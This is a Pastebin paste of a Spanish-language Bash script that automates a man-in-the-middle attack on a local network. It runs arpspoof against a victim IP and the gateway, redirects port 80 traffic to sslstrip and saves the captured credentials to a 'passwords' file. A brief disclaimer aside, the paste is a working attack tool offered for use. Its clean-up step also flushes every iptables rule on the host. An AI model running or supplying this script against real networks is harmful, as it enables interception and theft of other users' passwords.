Advertisement
Bloodmount32

Capturando trafico cifrado con SSLStrip by Bloodmount32

Sep 2nd, 2014
221
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.12 KB | None | 0 0
  1. #!/bin/bash
  2. # Disclaimer: This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
  3.  
  4. iface=$(ip route show | awk '(NR == 1) { print $5}')
  5. gateway=$(ip route show | awk '(NR == 1) { print $3}')
  6. echo "####################################"
  7. echo "#    MITM   -  ARP -  SSLSTRIP     #"
  8. echo "#         by Bloodmount32          #"
  9. echo "#          @Bloodmount32           #"
  10. echo "#   ----------------------------   #"
  11. echo "#    Capturando trafico cifrado    #"
  12. echo "#      con SSLStrip en red LAN     #"
  13. echo "####################################"
  14. echo
  15. echo -n "\033[33mIngrese la IP de la victima: \033[0m"
  16. read IP_Victim
  17. echo "-------------------------------------"
  18. echo $iface
  19. echo $gateway
  20. echo $IP_Victim
  21. echo passwords_$IP_Victim.txt
  22. echo "-------------------------------------"
  23. sleep 3
  24.  
  25. echo 1 > /proc/sys/net/ipv4/ip_forward
  26. iptables -t nat -A PREROUTING -p tcp --destination-port 80 --j REDIRECT --to-port 10000
  27. xterm -bg black -fg yellow -geometry 75x15+1+0 -T ARPSPOOF -e arpspoof -i $iface -t $IP_Victim $gateway & uno=$!
  28. xterm -bg black -fg red -geometry 75x15+1+0 -T ARPSPOOF -e arpspoof -i $iface -t $gateway $IP_Victim  & dos=$!
  29. xterm -bg black -fg yellow -geometry 75x15+1+0 -T SSLSTRIP -e sslstrip -p -f -l 10000 & tres=$!
  30.  
  31. echo "
  32.                          ########                  #
  33.                      #################            #
  34.                   ######################         #
  35.                  #########################      #
  36.                ############################
  37.               ##############################
  38.               ###############################
  39.              ###############################
  40.              ##############################
  41.                              #    ########   #
  42.                 \033[31m##        ###\033[0m        ####   ##
  43.                                      ###   ###
  44.                                    ####   ###
  45.               ####          ##########   ####
  46.               #######################   ####
  47.                 ####################   ####
  48.                  ##################  ####
  49.                    ############      ##
  50.                       ########        ###
  51.                      #########        #####
  52.                    ############      ######
  53.                   ########      #########
  54.                     #####       ########
  55.                       ###       #########
  56.                      ######    ############
  57.                     #######################
  58.                     #   #   ###  #   #   ##
  59.                     ########################
  60.                      ##     ##   ##     ##
  61. "
  62. echo "Para terminar el proceso de captura \033[31m presione la tecla ENTER\033[0m."
  63. read junk
  64. cp sslstrip.log passwords$IP_Victim.txt
  65. rm sslstrip.log
  66. sleep 3
  67. kill ${uno} &> /dev/null
  68. kill ${dos} &> /dev/null
  69. kill ${tres} &> /dev/null
  70. echo "Restaurando configuracion"
  71. echo 0 > /proc/sys/net/ipv4/ip_forward
  72. iptables --flush
  73. iptables --table nat --flush
  74. iptables --delete-chain
  75. iptables --table nat --delete-chain
  76. clear
  77. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement